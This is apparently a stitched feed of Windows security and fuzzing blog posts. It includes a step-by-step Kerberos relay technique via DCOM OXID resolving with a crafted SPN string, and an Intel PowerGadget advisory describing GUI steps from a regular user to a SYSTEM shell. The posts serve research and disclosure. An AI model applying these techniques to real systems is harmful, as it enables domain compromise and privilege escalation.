Reading view
Working your way Around an ACL
There's been plenty of recent discussion about Windows 11's Recall feature and how much of it is a garbage fire. Especially a discussion around how secure the database storing all those juicy details of your banking details, sexual peccadillos etc is from prying malware. Spoiler, it's only protected through being ACL'ed to SYSTEM and so any privilege escalation (or non-security boundary *cough*) is sufficient to leak the information.Β
However, I've not spent the time to setup Recall on any machine I own and the files are probably correctly ACL'ed. Therefore, this blog isn't here to talk about that, instead I was following a thread about Recall and the security of the database by Albacore on Mastodon and one toot in particular caught my interest.
"@DrewNaylor File Explorer always runs unelevated, Administrators also have access to C:\Program Files\WindowsApps yet you simply can't open it in File Explorer without breaking ACLs no matter how you try."
I thought this wasn't true based on what I know about the "C:\Program Files\WindowsApps" folder, so I decided to see if I can get it show in an unelevated explorer. It turns out to be more complex than it should be for various reasons, so let's dig in.
What is the WindowsApps Folder?
Finding a Suitable Access Token
Finishing the Job
Relaying Kerberos Authentication from DCOM OXID Resolving
Recently, there's been some good research into further exploiting DCOM authentication that I initially reported to Microsoft almost 10 years ago. By inducing authentication through DCOM it can be relayed to a network service, such as Active Directory Certificate Services (ADCS) to elevated privileges and in some cases get domain administrator access.
The important difference with this new research is taking the abuse of DCOM authentication from local access (in the case of the many Potatoes) to fully remote by abusing security configuration changes or over granting group access. For more information I'd recommend reading the slides fromΒ Tianze Ding Blackhat ASIA 2024 presentation, or reading about SilverPotato by Andrea Pierini.
This short blog post is directly based on slide 36 ofΒ Tianze Ding presentation where there's a mention on trying to relay Kerberos authentication from the initial OXID resolver request. I've reproduced the slide below:
The slides says that you can't relay Kerberos authentication during OXID resolving because you can't control the SPN used for the authentication. It's always set to RPCSS/MachineNameFromStringBinding. While you can control the string bindings in the standard OBJREF structure, RPCSS ignores the security bindings and so you can't specify the SPN unlikely with the an object RPC call which happens later.This description intrigued me, as I didn't think this was true. You just had to abuse a "feature" I described in my original Kerberos relay blog post. Specifically, that the Kerberos SSPI supports a special format for the SPN which includes marshaled target information. This was something I discovered when trying to see if I could get Kerberos relay from the SMB protocol, the SMB client would call theΒ SecMakeSPNEx2 API, which in turn would callΒ CredMarshalTargetInfoΒ to build a marshaled string which appended to the end of the SPN. If the Kerberos SSPI sees an SPN in this format, it calculates the length of the marshaled data, strips that from the SPN and continues with the new SPN string.
In practice what this means is you can build an SPN of the form CLASS/<SERVER><TARGETINFO> and Kerberos will authenticate using CLASS/<SERVER>. The interesting thing about this behavior is if the <SERVER><TARGETINFO>Β component is coming from the hostname of the server we're authenticating to then you can end up decoupling the SPN used for the authentication from the hostname that's used to communicate. And that's exactly what we got here, the MachineNameFromStringBinding is coming from an untrusted source, the OBJREF we specified. We can specify a machine name in this special format, this will allow the OXID resolver to talk to our server on hostname <SERVER><TARGETINFO> but authenticate using RPCSS/<SERVER> which can be anything we like.
There are some big caveats with this. Firstly, the machine name must not contain any dots, so it must be an intranet address. This is because it's close to impossible to a build a valid TARGETINFO string which represents a valid fully qualified domain name. In many situations this would rule out using this trick, however as we're dealing with domain authentication scenarios and the default for the Windows DNS server is to allow any user to create arbitrary hosts within the domain's DNS Zone this isn't an issue.
This restriction also limits the maximum size of the hostname to 63 characters due to the DNS protocol. If you pass a completely emptyΒ CREDENTIAL_TARGET_INFORMATION structure to theΒ CredMarshalTargetInfo API you get the minimum valid target information string, which is 44 characters long. This only leaves 19 characters for the SERVER component, but again this shouldn't be a big issue. Windows component names are typically limited to 15 characters due to the old NetBIOS protocol, and by default SPNs are registered with these short name forms. Finally in our case while there won't be an explicit RPCSS SPN registered, this is one of the service classes which is automatically mapped to the HOST class which will be registered.
To exploit this you'll need to do the following steps:
- Build the machine name by appending the hostname for for the target SPN to the minimum stringΒ 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA. For example for the SPN RPCSS/ADCSΒ build the string ADCS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.Β
- Register the machine name as a host on the domain's DNS server. Point the record to a server you control on which you can replace the listening service on TCP port 135.
- Build an OBJREF with the machine name and induce OXID resolving through your preferred method, such as abusing IStorage activation.
- Do something useful with the induced Kerberos authentication.
With this information I did some tests myself, and also Andrea checked with SilverPotato and it seems to work. There are limits of course, the big one is the security bindings are ignored so the OXID resolver uses Negotiate. This means the Kerberos authentication will always be negotiated with at least integrity enabled which makes the authentication useless for most scenarios, although it can be used for the default configuration of ADCS (I think).
Issues Resolving Symbols on Windows 11 on ARM64
This is a short blog post about an issue I encountered during some development work on my OleViewDotNet tool and how I resolved it. It might help others if they come across a similar problem, although I'm not sure if I took the best approach.
OleViewDotNet has the ability to parse the internal COM structures in a process and show important information such as the list of current IPIDs exported by the process and the access security descriptor.Β
PS C:\> $p.Ipids
IPIDΒ Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Interface NameΒ PIDΒ Β Process Name
----Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β --------------Β ---Β Β ------------
00008800-4bd8-0000-c3f9-170a9f197e11 IRundownΒ Β Β Β 19416Β powershell.exe
00009401-4bd8-ffff-45b0-a43d5764a731 IRundownΒ Β Β Β 19416Β powershell.exe
0000a002-4bd8-5264-7f87-e6cbe82784aa IRundownΒ Β Β Β 19416Β powershell.exe
To achieve this task we need access to the symbols of the COMBASE DLL so that we can resolve various root pointers to hash tables and other runtime artifacts. The majority of the code to parse the process information is in the COMProcessParser class, which uses the DBGHELP library to resolve symbols to an address. My code also supports a mechanism to cache the resolved pointers into a text file which can be subsequently used on other systems with the same COMBASE DLL rather than needing to pull down a 30+ MiB symbol file.
This works fine on Windows 11 x64, but I noticed that I would get incorrect results on ARM64. In the past I've encountered similar issues that have been down to changes in the internal structures used during parsing. Microsoft provides private symbols for COMBASE so its pretty easy to check if the structures were different between x64 and ARM64 versions of Windows 11. They were no differences that I could see. In any case, I noticed this also impacted trivial values, for example the symbol gSecDesc contains a pointer to the COM access security descriptor. However, when reading that pointer it was always NULL even though it should have been initialized.
To add the my confusion when I checked the symbol in WinDBG it showed the pointer was correctly initialized. However, if I did a search for the expected symbol using the x command in WinDBG I found something interesting:
00007ffa`d0aecb08 combase!gSecDesc = 0x00000000`00000000
00007ffa`d0aed1c8 combase!gSecDesc = 0x00000180`59fdb750
We can see from the output that there's two symbols for gSecDesc, not one. The first one has a NULL value while the second has the initialized value. When I checked what address my symbol resolver was returning it was the first one, where as WinDBG knew better and would return the second. What on earth is going on?
This is an artifact of a new feature in Windows 11 on ARM64 to simplify the emulation of x64 executables, ARM64X. This is a clever (or terrible) trick to avoid needing separate ARM64 and x64 binaries on the system. Instead both ARM64 and x64 compatible code, referred to as ARM64EC (Emulation Compatible), are merged into a single system binary. Presumably in some cases this means that global data structures need to be duplicated, once for the ARM64 code, and once for the ARM64EC code. In this case it doesn't seem like there should be two separate global data values as a pointer is a pointer, but I suppose there might be edge cases where that isn't true and it's simpler to just duplicate the values to avoid conflicts. The details are pretty interesting and there's a few places where this has been reverse engineered, I'd at least recommend this blog post.
My code is using the SymFromName API to query the symbol address, and this would just return the first symbol it finds which in this case was the ARM64EC one which wasn't initialized in an ARM64 process. I don't know if this is a bug in DBGHELP, perhaps it should try and return the symbol which matches the binary's machine type, or perhaps I'm holding it wrong. Regardless, I needed a way of getting the correct symbol, but after going through the DBGHELP library there was no obvious way of disambiguating the two. However, clearly WinDBG can do it, so there must be a way.
After a bit of hunting around I found that the Debug Interface Access (DIA) library has an IDiaSymbol::get_machineTypeΒ method which returns the machine type for the symbol, either ARM64 (0xAA64) or ARM64EC (0xA641). Unfortunately I'd intentionally used DBGHELP as it's installed by default on Windows where as DIA needs to be installed separately. There didn't seem to be an equivalent in the DBGHELP library.Β
Fortunately after poking around the DBGHELP library looking for a solution an opportunity presented itself. Internally in DBGHELP (at least recent versions) it uses a private copy of the DIA library. That in itself wouldn't be that helpful, except the library exports a couple of private APIs that allow a caller to query the current DIA state. For example, there's the SymGetDiaSession API which returns an instance of the IDiaSession interface. From that interface you can query for an instance of the IDiaSymbolΒ interface and then query the machine type. I'm not sure how compatible the version of DIA inside DBGHELP is relative to the publicly released version, but it's compatible enough for my purposes.
Update 2024/04/26: it wasΒ pointed out to meΒ that the machine type is present in the SYMBOL_INFO::Reserved[1] field so you don't need to do this whole approach with the DIA interface. The point still stands that you need to enumerate the symbols on ARM64 platforms as there could be multiple ones and you still need to check the machine type.
To resolve this issue the code in OleViewDotNet takes the following steps on ARM64 systems:
- Instead of calling SymFromNameΒ the code enumerate all symbols for a name.
- The SymGetDiaSession is called to get an instance of the IDiaSession interface.
- The IDiaSession::findSymbolByVA method is called to get an instance the IDiaSymbol interface for the symbol.
- The IDiaSymbol::get_machineTypeΒ method is called to get the machine type for the symbol.
- The symbol is filtered based on the context, e.g. if parsing an ARM64 process it uses the ARM64 symbol.
Intel PowerGadget 3.6 Local Privilege Escalation
Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair mode
Affected Products: Intel PowerGadget
Affected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on βMonday, βFebruary β1, β2021 9:43:20 PM (this seems to be the latest version), earlier versions might be affected as well.
Affected Platforms: Windows
Common Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGH
Risk score (CVSSv3): 7.8 HIGH Β AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)
I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update nor a security advisory. Intel said that they are OK with me making this finding public, under the condition that I would emphasize that the product is EOL.
Description and steps to replicate:
On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in the "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (meaning it prevents the sc.exe process from exiting). That process is running as NT AUTHORITY/SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be called by right-clicking on the console window bar and entering "properties". Once a web browser is spawn, attacker can call up the "Open" dialog and in that way get a fully working escape to explorer. From there they can, for example, browse through C:\Windows\System32 and right-click on cmd.exe and run it, obtaining as SYSTEM shell.
Now - an important detail - on most recent builds of Windows neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus for successful exploitation another browser has to already be present in the system. As you can see I pick Chrome and then spawn an instance of cmd.exe, which turns out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog, as if you pick the wrong one (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM and from then further attacks like this won't work if you want to repeat the POC - unless you reverse that change somewhere in the registry.
This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.
To run the installer in repair mode, one needs to identify the proper MSI file. After normal installation, it is by default present in C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like control sum, size or "author" information - just as presented in the screenshot below:
The exploitation process is illustrated in the screenshots below, reflecting the the steps taken to attain a SYSTEM shell (no exploit development is required, the issue can be exploited using GUI).
Just for the record, the versions of Chrome and Windows this was successfully performed on:
Recommendation:
Technically, as per the reference, it is recommended to change the way the sc.exe is called, using the WixQuietExec() method (see the second reference). In such case the conhost.exe window will not be visible to the user, thus making it impossible to perform any GUI interaction and an escape.
I am, however, aware that this product is no longer maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html) and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware why they need to replace PowerGadget with Intel Performance Counter Monitor.
Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).
References:
https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
https://wixtoolset.org/docs/v3/customactions/qtexec/
https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html)
https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi
Fuzzer Development 3: Building Bochs, MMU, and File I/0
Background
This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository
Introduction
Weβre continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.
In this post, weβre going to go over some changes and advancements weβve made to the fuzzer and also document some progress related to Bochs itself.
Syscall Infrastructure Update
After putting out the last blogpost, I got some really good feedback and suggestions by Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI-Register-Translation routines all together and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and Iβm admittedly a little embarrassed to have overlooked this possibility.
Previously, in our custom Musl code, we would have a C function call like so:
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
This is the function that is called when the program needs to make a syscall
with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucidβs context-switch function after shuffling the C ABI registers to Syscall registers like so:
static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
"r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
register long ret;
register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
register long r14 __asm__("r14") = SYSCALL;
register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
__asm__ __volatile__ (
"mov %1, %%rax\n\t"
"mov %2, %%rdi\n\t"
"mov %3, %%rsi\n\t"
"mov %4, %%rdx\n\t"
"mov %5, %%r10\n\t"
"mov %6, %%r8\n\t"
"mov %7, %%r9\n\t"
"call *%%r12\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
"r" (r12), "r" (r13), "r" (r14), "r" (r15)
: "rax", "rcx", "r11", "memory"
);
return ret;
}
So this was quite involved. I was very fixated on the idea that βLucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernelβ. This proved to lead me astray since such a complicated routine is not needed for our purposes, we are not actually a kernel, we just want to sandbox away syscalls for one specific program who behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (g_lucid_syscall)
return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we just simply created a new function pointer global variable in lucid.h
in Musl and gave it a definition in src/lucid.c
which can you see in the Musl patches in the repo. g_lucid_syscall
looks like this on the Rust side:
pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
-> u64
We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and itβs just a very much appreciated suggestion and I couldnβt be happier with how it turned out.
Calling Convention Changes
During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch
function itself work out how it should behave based on the contextβs values. In essence, weβre moving complexity from the caller-side to the callee-side. This means that the complexity doesnβt keep recurring throughout the codebase, it is encapsulated one time, in the context_switch
logic itself. This does require some hacky/brittle code however, for instance we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch
code has been changed to the following
extern "C" { fn context_switch(); }
global_asm!(
".global context_switch",
"context_switch:",
// Save the CPU flags before we do any operations
"pushfq",
// Save registers we use for scratch
"push r14",
"push r13",
// Determine what execution mode we're in
"mov r14, r15",
"add r14, 0x8", // mode is at offset 0x8 from base
"mov r14, [r14]",
"cmp r14d, 0x0",
"je save_bochs",
// We're in Lucid mode so save Lucid GPRs
"save_lucid: ",
"mov r14, r15",
"add r14, 0x10", // lucid_regs is at offset 0x10 from base
"jmp save_gprs",
// We're in Bochs mode so save Bochs GPRs
"save_bochs: ",
"mov r14, r15",
"add r14, 0x90", // bochs_regs is at offset 0x90 from base
"jmp save_gprs",
You can see that once we hit the context_switch
function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then weβre free to check the value of context->mode
in order to determine what mode of execution weβre in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.
Introducing Faults
Since the last blog-post, Iβve introduced the concept of Fault
which is an error class that is reserved for instances when some sort of error is encountered during either context-switching code or syscall-handling. This error is distinct from our highest-level error LucidErr
. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid calls any Fault
fatal.
We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucidβs state and context-switch into starting Bochs:
#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
// Set the execution mode and the reason why we're exiting the Lucid VM
context.mode = ExecMode::Lucid;
context.exit_reason = VmExit::StartBochs;
// Set up the calling convention and then start Bochs by context switching
unsafe {
asm!(
"push r15", // Callee-saved register we have to preserve
"mov r15, {0}", // Move context into R15
"call qword ptr [r15]", // Call context_switch
"pop r15", // Restore callee-saved register
in(reg) context as *mut LucidContext,
);
}
}
We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why weβre context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:
// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
pub context_switch: usize, // Address of context_switch()
So then our Lucid state is saved in the context_switch
routine and we are then passed to this logic:
// Handle Lucid context switches here
if LucidContext::is_lucid_mode(context) {
match exit_reason {
// Dispatch to Bochs entry point
VmExit::StartBochs => {
jump_to_bochs(context);
},
_ => {
fault!(context, Fault::BadLucidExit);
}
}
}
Finally, we call jump_to_bochs
:
// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
// RDX: we have to clear this register as the ABI specifies that exit
// hooks are set when rdx is non-null at program start
//
// RAX: arbitrarily used as a jump target to the program entry
//
// RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
// have to manually set it with a `mov`
//
// R15: holds a pointer to the execution context, if this value is non-
// null, then Bochs learns at start time that it is running under Lucid
//
// We don't really care about execution order as long as we specify clobbers
// with out/lateout, that way the compiler doesn't allocate a register we
// then immediately clobber
unsafe {
asm!(
"xor rdx, rdx",
"mov rsp, {0}",
"mov r15, {1}",
"jmp rax",
in(reg) (*context).bochs_rsp,
in(reg) context,
in("rax") (*context).bochs_entry,
lateout("rax") _, // Clobber (inout so no conflict with in)
out("rdx") _, // Clobber
out("r15") _, // Clobber
);
}
}
Full-blown context-switching like this, allows us to encounter a Fault
and then pass that error back to Lucid for handling. In the fault_handler
, we set the Fault
type in the execution context, and then we attempt to restore execution back to Lucid:
// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
let context = unsafe { &mut *contextp };
match fault {
Fault::Success => context.fault = Fault::Success,
...
}
// Attempt to restore Lucid execution
restore_lucid_execution(contextp);
}
// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal.
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
let context = unsafe { &mut *contextp };
// Fault should be set, but change the execution mode now since we're
// jumping back to Lucid
context.mode = ExecMode::Lucid;
// Restore extended state
let save_area = context.lucid_save_area;
let save_inst = context.save_inst;
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) };
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
// Next, we need to restore our GPRs. This is kind of different order than
// returning from a successful context switch since normally we'd still be
// using our own stack; however right now, we still have Bochs' stack, so
// we need to recover our own Lucid stack which is saved as RSP in our
// register bank
let lucid_regsp = &context.lucid_regs as *const _;
// Move that pointer into R14 and restore our GPRs. After that we have the
// RSP value that we saved when we called into context_switch, this RSP was
// then subtracted from by 0x8 for the pushfq operation that comes right
// after. So in order to recover our CPU flags, we need to manually sub
// 0x8 from the stack pointer. Pop the CPU flags back into place, and then
// return to the last known good Lucid state
unsafe {
asm!(
"mov r14, {0}",
"mov rax, [r14 + 0x0]",
"mov rbx, [r14 + 0x8]",
"mov rcx, [r14 + 0x10]",
"mov rdx, [r14 + 0x18]",
"mov rsi, [r14 + 0x20]",
"mov rdi, [r14 + 0x28]",
"mov rbp, [r14 + 0x30]",
"mov rsp, [r14 + 0x38]",
"mov r8, [r14 + 0x40]",
"mov r9, [r14 + 0x48]",
"mov r10, [r14 + 0x50]",
"mov r11, [r14 + 0x58]",
"mov r12, [r14 + 0x60]",
"mov r13, [r14 + 0x68]",
"mov r15, [r14 + 0x78]",
"mov r14, [r14 + 0x70]",
"sub rsp, 0x8",
"popfq",
"ret",
in(reg) lucid_regsp,
);
}
}
As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a Fault
occurs, we are likely operating in Bochs mode which means that our stack is Bochsβ stack and not Lucidβs. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucidβs saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the βreturnβ value of such functions by checking if there was a Fault
noted in the execution context like so:
// Start executing Bochs
prompt!("Starting Bochs...");
start_bochs(&mut lucid_context);
// Check to see if any faults occurred during Bochs execution
if !matches!(lucid_context.fault, Fault::Success) {
fatal!(LucidErr::from_fault(lucid_context.fault));
}
Pretty neat imo!
Sandboxing Thread-Local-Storage
Coming into this project, I honestly didnβt know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now Iβve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on.
Once I implemented the Fault
system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs
register was used to load the address from memory. Typically, fs
is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs
register. So I did a quick grep through Musl looking for fs
register access and found the following:
/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
mov %rdi,%rsi /* shift for syscall */
movl $0x1002,%edi /* SET_FS register */
movl $158,%eax /* set fs segment to */
syscall /* arch_prctl(SET_FS, arg)*/
ret
So this function, __set_thread_area
uses an inline syscall
instruction to call arch_prctl
to directly manipulate the fs
register. This made a lot of sense because, if the syscall
instruction was indeed called, we wouldnβt intercept this with our syscall sandboxing infrastructure because we never instrumented this, weβve only instrumented what boils down to the syscall()
function wrapper in Musl. So this would escape our sandbox and directly manipulate fs
. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c
:
int __init_tp(void *p)
{
pthread_t td = p;
td->self = td;
int r = __set_thread_area(TP_ADJ(p));
if (r < 0) return -1;
if (!r) libc.can_do_threads = 1;
td->detach_state = DT_JOINABLE;
td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
td->locale = &libc.global_locale;
td->robust_list.head = &td->robust_list.head;
td->sysinfo = __sysinfo;
td->next = td->prev = td;
return 0;
}
So in this __init_tp
function, weβre given a pointer and then we call TP_ADJ
macro to do some arithmetic on the pointer and pass that value to __set_thread_area
so that fs
is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area
itself, so I just changed the source so that Musl would instead just utilize the syscall()
wrapper function which calls our instrumented syscall functions under the hood, like so:
#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */
int __init_tp(void *p)
{
pthread_t td = p;
td->self = td;
int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
//int r = __set_thread_area(TP_ADJ(p));
Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to fs
(and there might be still!), we should be fine here. I also adjusted the Musl code so that if weβre running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the builtin_tls
:
static struct builtin_tls {
char c;
struct pthread pt;
void *space[16];
} builtin_tls[1];
So now, when __init_tp
is called, the pointer it is giving points to our own TLS block of memory weβve created in the execution context so that we now have access to things like errno
in Lucid:
if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
__asm__ __volatile__ ("int3"); // Added by me just in case
mem = (void *)__syscall(
SYS_mmap2,
0, libc.tls_size, PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
/* -4095...-1 cast to void * will crash on dereference anyway,
* so don't bloat the init code checking for error codes and
* explicitly calling a_crash(). */
} else {
// Check to see if we're running under Lucid or not
if (!g_lucid_ctx) { mem = builtin_tls; }
else { mem = &g_lucid_ctx->tls; }
}
/* Failure to initialize thread pointer is always fatal. */
if (__init_tp(__copy_tls(mem)) < 0)
a_crash();
#[repr(C)]
#[derive(Clone)]
pub struct Tls {
padding0: [u8; 8], // char c
padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
pub errno: i32,
padding2: [u8; 144], // Additional padding to get to 200-bytes total
padding3: [u8; 128], // 16 void * values
}
So now for example, if during a read
syscall, we get passed a NULL buffer, we can return an error code and set errno
appropriately from the syscall handler in Lucid:
// Now we need to make sure the buffer passed to read isn't NULL
let buf_p = a2 as *mut u8;
if buf_p.is_null() {
context.tls.errno = libc::EINVAL;
return -1_i64 as u64;
}
There may still be other accesses to fs
and gs
that Iβm not currently sandboxing, but we havenβt reached that part of development yet.
Building Bochs
I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built --static-pie
was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that weβll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasnβt enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didnβt have a C++ library that we could use that had been built against our custom Musl.
Luckily, there is an awesome project called the musl-cross-make
project, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the gcc
project.
musl-cross-make
will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as --static-pie
. It really was as simple as:
- git clone musl-cross-make
- configure an x86_64 tool chain target
- build the tool chain
- go into its Musl directory, apply our Musl patches
- configure Musl to build/install into the musl-cross-make output directory
- re-build Musl libc
- configure Bochs to use the new toolchain and set the
--static-pie
flag
This is the Bochs configuration file that I used to build Bochs:
#!/bin/sh
CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"
export CC
export CXX
export CFLAGS
export CXXFLAGS
./configure --enable-sb16 \
--enable-all-optimizations \
--enable-long-phy-address \
--enable-a20-pin \
--enable-cpu-level=6 \
--enable-x86-64 \
--enable-vmx=2 \
--enable-pci \
--enable-usb \
--enable-usb-ohci \
--enable-usb-ehci \
--enable-usb-xhci \
--enable-busmouse \
--enable-e1000 \
--enable-show-ips \
--enable-avx \
--with-nogui
